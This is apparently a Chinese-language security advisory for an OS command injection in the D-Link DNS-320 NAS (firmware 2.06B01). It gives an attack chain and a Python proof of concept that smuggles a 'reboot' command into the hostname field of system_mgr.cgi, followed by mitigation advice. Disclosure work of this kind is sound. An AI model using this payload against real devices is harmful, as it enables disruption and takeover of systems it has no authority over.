CVE-2026-8273 D-Link DNS-320 OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8273

漏洞类型

操作系统命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-320

漏洞概述

D-Link DNS-320 2.06B01版本存在操作系统命令注入漏洞。该漏洞由于/cgi-bin/system_mgr.cgi文件中的多个函数未严格过滤用户输入导致。攻击者需具备高权限，可远程发起攻击，执行任意系统命令，影响设备机密性、完整性和可用性。

技术细节

该漏洞存在于D-Link DNS-320 NAS设备的system_mgr.cgi脚本中。具体受影响的函数包括cgi_set_host、cgi_set_ntp、cgi_fan_control和cgi_merge_user。由于这些函数在处理用户提交的参数时，未对特殊字符（如分号、管道符）进行有效的过滤或转义，导致攻击者可以将恶意构造的操作系统命令拼接到正常参数中。结合CVSS向量（PR:H），攻击者需要先获取管理员权限，随后向CGI接口发送特制数据包，即可在服务器端远程执行任意Shell命令，从而完全控制设备。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出存在漏洞的D-Link DNS-320设备及其版本信息。

STEP 2

2. 获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解或凭据窃取获取设备管理员账号密码。

STEP 3

3. 构造载荷

攻击者构造包含Shell元字符的恶意数据包，针对/cgi-bin/system_mgr.cgi中的特定函数。

STEP 4

4. 执行攻击

发送恶意请求，设备后端解析参数并执行注入的系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://<target_ip>/cgi-bin/system_mgr.cgi"
# Exploiting cgi_set_host function
# Payload example: injecting 'reboot' command
payload = {
    "cmd": "cgi_set_host",
    "hostname": "test; reboot; #"
}
# High privileges are required, so valid session cookies must be included in headers
headers = {
    "Cookie": "uid=admin_session_id"
}

try:
    response = requests.post(target, data=payload, headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Exploit failed: {e}")

影响范围

D-Link DNS-320 2.06B01

防御指南

临时缓解措施

建议用户立即检查设备版本，若为2.06B01，请暂时关闭设备远程管理功能，仅通过局域网访问管理后台，并密切关注D-Link官方发布的安全补丁。